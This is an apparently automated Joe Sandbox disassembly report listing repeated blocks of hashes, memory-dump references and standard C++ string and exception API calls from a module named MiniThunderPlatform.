                                                                                                                                              • Opcode ID: ec0a10fb46eaf3227a94bac6ab70af60f0dee3e4849fe5e2af92cb30bb8d2ec0
                                                                                                                                              • Instruction ID: 93708457ce3364426438720ce8ae5f520a679076ce35d34ff1d635e821787368
                                                                                                                                              • Opcode Fuzzy Hash: ec0a10fb46eaf3227a94bac6ab70af60f0dee3e4849fe5e2af92cb30bb8d2ec0
                                                                                                                                              • Instruction Fuzzy Hash: E9F0FF75900129EFCF149FA8C88CAEDBBB5FF1C61AF008189F812A6250CB715648DB94
                                                                                                                                              APIs
                                                                                                                                              • __EH_prolog.LIBCMT ref: 1000142E
                                                                                                                                              • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBD@Z.MSVCP71(?,10277ABC), ref: 10001441
                                                                                                                                              • ?append@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV12@ABV12@@Z.MSVCP71(?), ref: 10001452
                                                                                                                                              • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z.MSVCP71(00000000), ref: 1000145C
                                                                                                                                              • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP71 ref: 1000146C
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 0000000E.00000002.1619279871.0000000010001000.00000040.00000001.01000000.00000014.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                              • Associated: 0000000E.00000002.1619245039.0000000010000000.00000002.00000001.01000000.00000014.sdmp
                                                                                                                                              • Associated: 0000000E.00000002.1619279871.00000000102FE000.00000040.00000001.01000000.00000014.sdmp
                                                                                                                                              • Associated: 0000000E.00000002.1619279871.0000000010360000.00000040.00000001.01000000.00000014.sdmp
                                                                                                                                              • Associated: 0000000E.00000002.1619972434.000000001037F000.00000080.00000001.01000000.00000014.sdmp
                                                                                                                                              • Associated: 0000000E.00000002.1619997206.0000000010380000.00000004.00000001.01000000.00000014.sdmp
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_14_2_10000000_MiniThunderPlatform.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: D@2@@std@@D@std@@U?$char_traits@V?$allocator@$??0?$basic_string@$??1?$basic_string@?append@?$basic_string@H_prologV01@@V12@V12@@
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID: 2246152937-0
                                                                                                                                              • Opcode ID: 77f7d1e099799458267b1569c5f0a077b767e7d97e441666f2097fdcde38c869
                                                                                                                                              • Instruction ID: 61fc3d0234fa509a7d29d2f566cea25b3bd300205352742d70cd1ddee8761c45
                                                                                                                                              • Opcode Fuzzy Hash: 77f7d1e099799458267b1569c5f0a077b767e7d97e441666f2097fdcde38c869
                                                                                                                                              • Instruction Fuzzy Hash: D0F0FF75900129EFCF149FA8C88CBEDBBB5FF1C61AF008189F816A6250CB715648DB90
                                                                                                                                              APIs
                                                                                                                                              • __EH_prolog.LIBCMT ref: 10001487
                                                                                                                                              • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z.MSVCP71(?,10277ABC), ref: 1000149A
                                                                                                                                              • ??Y?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@PBD@Z.MSVCP71(?), ref: 100014AB
                                                                                                                                              • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z.MSVCP71(00000000), ref: 100014B5
                                                                                                                                              • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP71 ref: 100014C5
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 0000000E.00000002.1619279871.0000000010001000.00000040.00000001.01000000.00000014.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                              • Associated: 0000000E.00000002.1619245039.0000000010000000.00000002.00000001.01000000.00000014.sdmp
                                                                                                                                              • Associated: 0000000E.00000002.1619279871.00000000102FE000.00000040.00000001.01000000.00000014.sdmp
                                                                                                                                              • Associated: 0000000E.00000002.1619279871.0000000010360000.00000040.00000001.01000000.00000014.sdmp
                                                                                                                                              • Associated: 0000000E.00000002.1619972434.000000001037F000.00000080.00000001.01000000.00000014.sdmp
                                                                                                                                              • Associated: 0000000E.00000002.1619997206.0000000010380000.00000004.00000001.01000000.00000014.sdmp
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_14_2_10000000_MiniThunderPlatform.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: D@2@@std@@D@std@@U?$char_traits@V?$allocator@$??0?$basic_string@V01@@$??1?$basic_string@H_prologV01@Y?$basic_string@
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID: 4086989287-0
                                                                                                                                              • Opcode ID: 669989e8453a815d60e42e330a280267aa171774246bb677b0e3dac4aadf3ad2
                                                                                                                                              • Instruction ID: 628354f3db30c2816ce947433da812e984e4d389e5d6357536f18cebb6d872b2
                                                                                                                                              • Opcode Fuzzy Hash: 669989e8453a815d60e42e330a280267aa171774246bb677b0e3dac4aadf3ad2
                                                                                                                                              • Instruction Fuzzy Hash: B7F01275D00129EFCF14DFA8C88CBEDBBB5FB1C61AF008189F816A6250CB705648DB90
                                                                                                                                              APIs
                                                                                                                                              • __EH_prolog.LIBCMT ref: 100014E0
                                                                                                                                              • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z.MSVCP71(?,00000000,?,?,?,?,?,?,?,?,?,?,?,?,1005BF55), ref: 100014F3
                                                                                                                                              • ??Y?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@D@Z.MSVCP71(?,?,?,?,?,?,?,?,?,?,?,?,?,1005BF55,?,92492493), ref: 10001504
                                                                                                                                              • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z.MSVCP71(00000000,?,?,?,?,?,?,?,?,?,?,?,?,1005BF55,?,92492493), ref: 1000150E
                                                                                                                                              • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP71(?,?,?,?,?,?,?,?,?,?,?,?,1005BF55,?,92492493,10245278), ref: 1000151E
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 0000000E.00000002.1619279871.0000000010001000.00000040.00000001.01000000.00000014.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                              • Associated: 0000000E.00000002.1619245039.0000000010000000.00000002.00000001.01000000.00000014.sdmp
                                                                                                                                              • Associated: 0000000E.00000002.1619279871.00000000102FE000.00000040.00000001.01000000.00000014.sdmp
                                                                                                                                              • Associated: 0000000E.00000002.1619279871.0000000010360000.00000040.00000001.01000000.00000014.sdmp
                                                                                                                                              • Associated: 0000000E.00000002.1619972434.000000001037F000.00000080.00000001.01000000.00000014.sdmp
                                                                                                                                              • Associated: 0000000E.00000002.1619997206.0000000010380000.00000004.00000001.01000000.00000014.sdmp
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_14_2_10000000_MiniThunderPlatform.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: D@2@@std@@D@std@@U?$char_traits@V?$allocator@$??0?$basic_string@V01@@$??1?$basic_string@H_prologV01@Y?$basic_string@
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID: 4086989287-0
                                                                                                                                              • Opcode ID: 96ff9720acb9ef27cb61ae47ac1406b262a8480d0e299d3fd7bab87f8ad52bfd
                                                                                                                                              • Instruction ID: 1a0ecac5412804a9b58f2cb91d2e5ef4de4c80c832e85645f430d3c6943b9129
                                                                                                                                              • Opcode Fuzzy Hash: 96ff9720acb9ef27cb61ae47ac1406b262a8480d0e299d3fd7bab87f8ad52bfd
                                                                                                                                              • Instruction Fuzzy Hash: A4F01775D00129EFCF14DFA8C84CBEDBBB5FB1C619F008189F816A6250CB705644DB90
                                                                                                                                              APIs
                                                                                                                                              • __EH_prolog.LIBCMT ref: 10001539
                                                                                                                                              • ??0?$basic_string@_WU?$char_traits@_W@std@@V?$allocator@_W@2@@std@@QAE@ABV01@@Z.MSVCP71(?), ref: 1000154C
                                                                                                                                              • ?append@?$basic_string@_WU?$char_traits@_W@std@@V?$allocator@_W@2@@std@@QAEAAV12@ABV12@@Z.MSVCP71(00000000), ref: 1000155D
                                                                                                                                              • ??0?$basic_string@_WU?$char_traits@_W@std@@V?$allocator@_W@2@@std@@QAE@ABV01@@Z.MSVCP71(00000000), ref: 10001567
                                                                                                                                              • ??1?$basic_string@_WU?$char_traits@_W@std@@V?$allocator@_W@2@@std@@QAE@XZ.MSVCP71 ref: 10001577
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 0000000E.00000002.1619279871.0000000010001000.00000040.00000001.01000000.00000014.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                              • Associated: 0000000E.00000002.1619245039.0000000010000000.00000002.00000001.01000000.00000014.sdmp
                                                                                                                                              • Associated: 0000000E.00000002.1619279871.00000000102FE000.00000040.00000001.01000000.00000014.sdmp
                                                                                                                                              • Associated: 0000000E.00000002.1619279871.0000000010360000.00000040.00000001.01000000.00000014.sdmp
                                                                                                                                              • Associated: 0000000E.00000002.1619972434.000000001037F000.00000080.00000001.01000000.00000014.sdmp
                                                                                                                                              • Associated: 0000000E.00000002.1619997206.0000000010380000.00000004.00000001.01000000.00000014.sdmp
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_14_2_10000000_MiniThunderPlatform.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: U?$char_traits@_V?$allocator@_W@2@@std@@W@std@@$??0?$basic_string@_V01@@$??1?$basic_string@_?append@?$basic_string@_H_prologV12@V12@@
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID: 2583362943-0
                                                                                                                                              • Opcode ID: 8f59378f24c59a3d1730b2e10ab512f85a855f19ecbe122f571346eb8e73020f
                                                                                                                                              • Instruction ID: a4abf127c3a6097a3bcd637e965759495039974d84d57af22f5d25f4052434e3
                                                                                                                                              • Opcode Fuzzy Hash: 8f59378f24c59a3d1730b2e10ab512f85a855f19ecbe122f571346eb8e73020f
                                                                                                                                              • Instruction Fuzzy Hash: 0CF0177590012AEFCF14DFA8C84D7EDBBB4FB1C615F008149E816A2251CB745648CBA0
                                                                                                                                              APIs
                                                                                                                                              • __EH_prolog.LIBCMT ref: 1000107A
                                                                                                                                              • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP71 ref: 10001090
                                                                                                                                              • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP71 ref: 1000109D
                                                                                                                                              • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP71 ref: 100010AA
                                                                                                                                              • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP71 ref: 100010B7
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 0000000E.00000002.1619279871.0000000010001000.00000040.00000001.01000000.00000014.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                              • Associated: 0000000E.00000002.1619245039.0000000010000000.00000002.00000001.01000000.00000014.sdmp
                                                                                                                                              • Associated: 0000000E.00000002.1619279871.00000000102FE000.00000040.00000001.01000000.00000014.sdmp
                                                                                                                                              • Associated: 0000000E.00000002.1619279871.0000000010360000.00000040.00000001.01000000.00000014.sdmp
                                                                                                                                              • Associated: 0000000E.00000002.1619972434.000000001037F000.00000080.00000001.01000000.00000014.sdmp
                                                                                                                                              • Associated: 0000000E.00000002.1619997206.0000000010380000.00000004.00000001.01000000.00000014.sdmp
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_14_2_10000000_MiniThunderPlatform.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: ??1?$basic_string@D@2@@std@@D@std@@U?$char_traits@V?$allocator@$H_prolog
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID: 1526739352-0
                                                                                                                                              • Opcode ID: 27ae8f861a2d6f0784d7def67a891ac4cbd6a64366ffa47ff8682db076154127
                                                                                                                                              • Instruction ID: e81a82610130bd97dde222f01576707286f18ec18f1bfe2055d7363ac9ad83c0
                                                                                                                                              • Opcode Fuzzy Hash: 27ae8f861a2d6f0784d7def67a891ac4cbd6a64366ffa47ff8682db076154127
                                                                                                                                              • Instruction Fuzzy Hash: 1DF05870800665EFD724CBA4CA4D79DBBB0FB28715F0042CDE49793692DBB06A48CB10
                                                                                                                                              APIs
                                                                                                                                              • __EH_prolog.LIBCMT ref: 1000119C
                                                                                                                                              • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP71 ref: 100011AB
                                                                                                                                              • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP71 ref: 100011B8
                                                                                                                                              • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP71 ref: 100011C5
                                                                                                                                              • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP71 ref: 100011D2
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 0000000E.00000002.1619279871.0000000010001000.00000040.00000001.01000000.00000014.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                              • Associated: 0000000E.00000002.1619245039.0000000010000000.00000002.00000001.01000000.00000014.sdmp
                                                                                                                                              • Associated: 0000000E.00000002.1619279871.00000000102FE000.00000040.00000001.01000000.00000014.sdmp
                                                                                                                                              • Associated: 0000000E.00000002.1619279871.0000000010360000.00000040.00000001.01000000.00000014.sdmp
                                                                                                                                              • Associated: 0000000E.00000002.1619972434.000000001037F000.00000080.00000001.01000000.00000014.sdmp
                                                                                                                                              • Associated: 0000000E.00000002.1619997206.0000000010380000.00000004.00000001.01000000.00000014.sdmp
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_14_2_10000000_MiniThunderPlatform.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: ??0?$basic_string@D@2@@std@@D@std@@U?$char_traits@V?$allocator@$H_prolog
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID: 40241651-0
                                                                                                                                              • Opcode ID: ddb4add9e56fd4b2343ffbbe73e3a50fb5d7ba457c25312ca9d41adca80d7053
                                                                                                                                              • Instruction ID: 6570485a09fea2c99c3ef3aed8de5a85abecc1f9c3104c70fa3ddf0ef5ed81be
                                                                                                                                              • Opcode Fuzzy Hash: ddb4add9e56fd4b2343ffbbe73e3a50fb5d7ba457c25312ca9d41adca80d7053
                                                                                                                                              • Instruction Fuzzy Hash: 09F05831810664DFC725CF94C44C7ADBBB0FB28A05F00418DF44393A50CBB06A48CB91
                                                                                                                                              APIs
                                                                                                                                              • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBD@Z.MSVCP71(cfg_file::read, _pos + length > _end or length > READ_BUFFER_LEN,?,?,?,?), ref: 10089075
                                                                                                                                              • _CxxThrowException.MSVCR71(?,102B5DEC), ref: 1008909D
                                                                                                                                              • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBD@Z.MSVCP71(cfg_file::read, _pos + length > _end or length > READ_BUFFER_LEN,?,?,?,?), ref: 100890ED
                                                                                                                                              • _CxxThrowException.MSVCR71(?,102B5DEC), ref: 10089115
                                                                                                                                              • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBD@Z.MSVCP71(cfg_file::read, _pos + length > _end or length > READ_BUFFER_LEN,?,?,?,?), ref: 10089165
                                                                                                                                              • _CxxThrowException.MSVCR71(?,102B5DEC), ref: 1008918D
                                                                                                                                              • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBD@Z.MSVCP71(cfg_file::read, _pos + length > _end or length > READ_BUFFER_LEN,?,?,?,?), ref: 100891DD
                                                                                                                                              • _CxxThrowException.MSVCR71(?,102B5DEC), ref: 10089205
                                                                                                                                              • ?assign@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV12@PBDI@Z.MSVCP71(00000000,?,00000000,?,?,?,00000000), ref: 10089262
                                                                                                                                              • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBD@Z.MSVCP71(cfg_file::read, _pos + length > _end or length > READ_BUFFER_LEN,?,?,?,?), ref: 10089275
                                                                                                                                              • _CxxThrowException.MSVCR71(?,102B5DEC), ref: 1008929D
                                                                                                                                              • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP71(?,?,?,?), ref: 10089358
                                                                                                                                              • ??_V@YAXPAX@Z.MSVCR71(?), ref: 10089374
                                                                                                                                              Strings
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 0000000E.00000002.1619279871.0000000010001000.00000040.00000001.01000000.00000014.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                              • Associated: 0000000E.00000002.1619245039.0000000010000000.00000002.00000001.01000000.00000014.sdmp
                                                                                                                                              • Associated: 0000000E.00000002.1619279871.00000000102FE000.00000040.00000001.01000000.00000014.sdmp
                                                                                                                                              • Associated: 0000000E.00000002.1619279871.0000000010360000.00000040.00000001.01000000.00000014.sdmp
                                                                                                                                              • Associated: 0000000E.00000002.1619972434.000000001037F000.00000080.00000001.01000000.00000014.sdmp
                                                                                                                                              • Associated: 0000000E.00000002.1619997206.0000000010380000.00000004.00000001.01000000.00000014.sdmp
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_14_2_10000000_MiniThunderPlatform.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: D@2@@std@@D@std@@U?$char_traits@V?$allocator@$??0?$basic_string@ExceptionThrow$??1?$basic_string@?assign@?$basic_string@V12@
                                                                                                                                              • String ID: S
                                                                                                                                              • API String ID: 2831823523-543223747
                                                                                                                                              • Opcode ID: 7e1c75d00faac54d2a5cf5a1d82adef04dba16750f7a11af559bdf847db4d09d
                                                                                                                                              • Instruction ID: 8bf02235b5153f7712f9d9c3b128d624db6b3c3292b39eda6360b1097654bec0
                                                                                                                                              • Opcode Fuzzy Hash: 7e1c75d00faac54d2a5cf5a1d82adef04dba16750f7a11af559bdf847db4d09d
                                                                                                                                              • Instruction Fuzzy Hash: 06510134A05245CFD714DF04C688A9AF7F2FF85328F29C19AC8495B352CB75AE4ACB85
                                                                                                                                              APIs
                                                                                                                                              • __EH_prolog.LIBCMT ref: 10005016
                                                                                                                                              • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBD@Z.MSVCP71(map/set<T> too long,00000000,10311338,?,?,?,?,?,?,10006C17,00000000,?,?,00000000,?,?), ref: 10005034
                                                                                                                                                • Part of subcall function 10001598: __EH_prolog.LIBCMT ref: 1000159D
                                                                                                                                                • Part of subcall function 10001598: ??0exception@@QAE@XZ.MSVCR71(?,?,1001E6D1,?,?,?,?), ref: 100015A9
                                                                                                                                                • Part of subcall function 10001598: ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z.MSVCP71(?,?,1001E6D1,?,?,?,?), ref: 100015BF
                                                                                                                                              • _CxxThrowException.MSVCR71 ref: 1000505A
                                                                                                                                              Strings
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 0000000E.00000002.1619279871.0000000010001000.00000040.00000001.01000000.00000014.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                              • Associated: 0000000E.00000002.1619245039.0000000010000000.00000002.00000001.01000000.00000014.sdmp
                                                                                                                                              • Associated: 0000000E.00000002.1619279871.00000000102FE000.00000040.00000001.01000000.00000014.sdmp
                                                                                                                                              • Associated: 0000000E.00000002.1619279871.0000000010360000.00000040.00000001.01000000.00000014.sdmp
                                                                                                                                              • Associated: 0000000E.00000002.1619972434.000000001037F000.00000080.00000001.01000000.00000014.sdmp
                                                                                                                                              • Associated: 0000000E.00000002.1619997206.0000000010380000.00000004.00000001.01000000.00000014.sdmp
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_14_2_10000000_MiniThunderPlatform.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: ??0?$basic_string@D@2@@std@@D@std@@H_prologU?$char_traits@V?$allocator@$??0exception@@ExceptionThrowV01@@
                                                                                                                                              • String ID: map/set<T> too long
                                                                                                                                              • API String ID: 1391971735-1285458680
                                                                                                                                              • Opcode ID: 48789c0c12ebc827c6c8203bbc2509d1bccdd476e4809369352c37a406807bed
                                                                                                                                              • Instruction ID: f32a2f961b285677ad352d321e49fda82d1f15d7c97faa85a9f17f74f26a5471
                                                                                                                                              • Opcode Fuzzy Hash: 48789c0c12ebc827c6c8203bbc2509d1bccdd476e4809369352c37a406807bed
                                                                                                                                              • Instruction Fuzzy Hash: 7A515374600241DFD715CF08C484A9AFBE5FF4A344F198689E86A9B366C7B2FC81CB90
                                                                                                                                              APIs
                                                                                                                                              • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBD@Z.MSVCP71(cfg_file::read, _pos + length > _end or length > READ_BUFFER_LEN,?,?,?,?), ref: 100890ED
                                                                                                                                              • _CxxThrowException.MSVCR71(?,102B5DEC), ref: 10089115
                                                                                                                                              • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBD@Z.MSVCP71(cfg_file::read, _pos + length > _end or length > READ_BUFFER_LEN,?,?,?,?), ref: 10089165
                                                                                                                                              • _CxxThrowException.MSVCR71(?,102B5DEC), ref: 1008918D
                                                                                                                                              • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBD@Z.MSVCP71(cfg_file::read, _pos + length > _end or length > READ_BUFFER_LEN,?,?,?,?), ref: 100891DD
                                                                                                                                              • _CxxThrowException.MSVCR71(?,102B5DEC), ref: 10089205
                                                                                                                                              • ?assign@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV12@PBDI@Z.MSVCP71(00000000,?,00000000,?,?,?,00000000), ref: 10089262
                                                                                                                                              • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBD@Z.MSVCP71(cfg_file::read, _pos + length > _end or length > READ_BUFFER_LEN,?,?,?,?), ref: 10089275
                                                                                                                                              • _CxxThrowException.MSVCR71(?,102B5DEC), ref: 1008929D
                                                                                                                                              • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP71(?,?,?,?), ref: 10089358
                                                                                                                                              • ??_V@YAXPAX@Z.MSVCR71(?), ref: 10089374
                                                                                                                                              Strings
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 0000000E.00000002.1619279871.0000000010001000.00000040.00000001.01000000.00000014.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                              • Associated: 0000000E.00000002.1619245039.0000000010000000.00000002.00000001.01000000.00000014.sdmp
                                                                                                                                              • Associated: 0000000E.00000002.1619279871.00000000102FE000.00000040.00000001.01000000.00000014.sdmp
                                                                                                                                              • Associated: 0000000E.00000002.1619279871.0000000010360000.00000040.00000001.01000000.00000014.sdmp
                                                                                                                                              • Associated: 0000000E.00000002.1619972434.000000001037F000.00000080.00000001.01000000.00000014.sdmp
                                                                                                                                              • Associated: 0000000E.00000002.1619997206.0000000010380000.00000004.00000001.01000000.00000014.sdmp
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_14_2_10000000_MiniThunderPlatform.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: D@2@@std@@D@std@@U?$char_traits@V?$allocator@$??0?$basic_string@ExceptionThrow$??1?$basic_string@?assign@?$basic_string@V12@
                                                                                                                                              • String ID: S
                                                                                                                                              • API String ID: 2831823523-543223747
                                                                                                                                              APIs
                                                                                                                                              • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBD@Z.MSVCP71(cfg_file::read, _pos + length > _end or length > READ_BUFFER_LEN,?,?,?,?), ref: 10089165
                                                                                                                                              • _CxxThrowException.MSVCR71(?,102B5DEC), ref: 1008918D
                                                                                                                                              • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBD@Z.MSVCP71(cfg_file::read, _pos + length > _end or length > READ_BUFFER_LEN,?,?,?,?), ref: 100891DD
                                                                                                                                              • _CxxThrowException.MSVCR71(?,102B5DEC), ref: 10089205
                                                                                                                                              • ?assign@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV12@PBDI@Z.MSVCP71(00000000,?,00000000,?,?,?,00000000), ref: 10089262
                                                                                                                                              • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBD@Z.MSVCP71(cfg_file::read, _pos + length > _end or length > READ_BUFFER_LEN,?,?,?,?), ref: 10089275
                                                                                                                                              • _CxxThrowException.MSVCR71(?,102B5DEC), ref: 1008929D
                                                                                                                                              • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP71(?,?,?,?), ref: 10089358
                                                                                                                                              • ??_V@YAXPAX@Z.MSVCR71(?), ref: 10089374
                                                                                                                                              Strings
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 0000000E.00000002.1619279871.0000000010001000.00000040.00000001.01000000.00000014.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                              • Associated: 0000000E.00000002.1619245039.0000000010000000.00000002.00000001.01000000.00000014.sdmp
                                                                                                                                              • Associated: 0000000E.00000002.1619279871.00000000102FE000.00000040.00000001.01000000.00000014.sdmp
                                                                                                                                              • Associated: 0000000E.00000002.1619279871.0000000010360000.00000040.00000001.01000000.00000014.sdmp
                                                                                                                                              • Associated: 0000000E.00000002.1619972434.000000001037F000.00000080.00000001.01000000.00000014.sdmp
                                                                                                                                              • Associated: 0000000E.00000002.1619997206.0000000010380000.00000004.00000001.01000000.00000014.sdmp
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_14_2_10000000_MiniThunderPlatform.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: D@2@@std@@D@std@@U?$char_traits@V?$allocator@$??0?$basic_string@ExceptionThrow$??1?$basic_string@?assign@?$basic_string@V12@
                                                                                                                                              • String ID: S
                                                                                                                                              • API String ID: 2831823523-543223747
                                                                                                                                              APIs
                                                                                                                                              • ??3@YAXPAX@Z.MSVCR71(00000000), ref: 100497B8
                                                                                                                                                • Part of subcall function 100261B0: __EH_prolog.LIBCMT ref: 100261B5
                                                                                                                                                • Part of subcall function 100261B0: ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBD@Z.MSVCP71(?,?,?), ref: 100261DE
                                                                                                                                                • Part of subcall function 100261B0: ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z.MSVCP71(00000000,?,?), ref: 1002620C
                                                                                                                                                • Part of subcall function 100261B0: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP71(?,?), ref: 10026226
                                                                                                                                                • Part of subcall function 100261B0: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP71(?,?), ref: 1002623C
                                                                                                                                                • Part of subcall function 100261B0: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP71(?,?,?,?), ref: 1002625A
                                                                                                                                              Strings
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 0000000E.00000002.1619279871.0000000010001000.00000040.00000001.01000000.00000014.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                              • Associated: 0000000E.00000002.1619245039.0000000010000000.00000002.00000001.01000000.00000014.sdmp
                                                                                                                                              • Associated: 0000000E.00000002.1619279871.00000000102FE000.00000040.00000001.01000000.00000014.sdmp
                                                                                                                                              • Associated: 0000000E.00000002.1619279871.0000000010360000.00000040.00000001.01000000.00000014.sdmp
                                                                                                                                              • Associated: 0000000E.00000002.1619972434.000000001037F000.00000080.00000001.01000000.00000014.sdmp
                                                                                                                                              • Associated: 0000000E.00000002.1619997206.0000000010380000.00000004.00000001.01000000.00000014.sdmp
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_14_2_10000000_MiniThunderPlatform.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: D@2@@std@@D@std@@U?$char_traits@V?$allocator@$??1?$basic_string@$??0?$basic_string@$??3@H_prologV01@@
                                                                                                                                              • String ID: .\file_asyn_io_helper.cpp$operation_ptr != NULL$thunder_assert
                                                                                                                                              • API String ID: 1027865869-4018520618
                                                                                                                                              APIs
                                                                                                                                              • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBD@Z.MSVCP71(cfg_file::read, _pos + length > _end or length > READ_BUFFER_LEN,?,?,?,?), ref: 100891DD
                                                                                                                                              • _CxxThrowException.MSVCR71(?,102B5DEC), ref: 10089205
